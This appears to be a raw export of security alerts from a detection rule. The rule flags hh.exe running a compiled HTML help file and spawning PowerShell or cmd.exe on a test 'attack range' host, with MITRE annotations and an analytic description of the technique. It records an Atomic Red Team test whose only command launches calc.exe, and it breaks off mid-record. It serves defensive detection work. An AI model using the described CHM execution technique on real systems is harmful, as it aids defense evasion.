1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:24", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:24", parent_process="unknown", parent_process_id="6064", process="unknown", process_id="8036", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="Administrator", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:22", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:22", parent_process="unknown", parent_process_id="7392", process="unknown", process_id="7400", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:22", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:22", parent_process="unknown", parent_process_id="7392", process="unknown", process_id="7400", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="Administrator", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:27", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:27", parent_process="unknown", parent_process_id="7388", process="unknown", process_id="6948", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:27", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:27", parent_process="unknown", parent_process_id="7388", process="unknown", process_id="6948", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="Administrator", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:29", parent_process="unknown", parent_process_id="7824", process="unknown", process_id="5360", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:29", parent_process="unknown", parent_process_id="7824", process="unknown", process_id="5360", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="Administrator", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:31", parent_process="unknown", parent_process_id="668", process="unknown", process_id="1012", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:31", parent_process="unknown", parent_process_id="668", process="unknown", process_id="1012", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="Administrator", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:08", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:08", parent_process="unknown", parent_process_id="528", process="unknown", process_id="6216", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="cmd.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:08", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:08", parent_process="unknown", parent_process_id="528", process="unknown", process_id="6216", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="Administrator", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="cmd.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:08", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:08", parent_process="hh.exe  C:\\AtomicRedTeam\\atomics\\T1218.001\\src\\T1218.001.chm", parent_process_id="528", process="\"C:\\Windows\\System32\\cmd.exe\" /c calc.exe", process_id="6216", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="cmd.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:08", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:08", parent_process="hh.exe  C:\\AtomicRedTeam\\atomics\\T1218.001\\src\\T1218.001.chm", parent_process_id="528", process="\"C:\\Windows\\System32\\cmd.exe\" /c calc.exe", process_id="6216", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="Administrator", 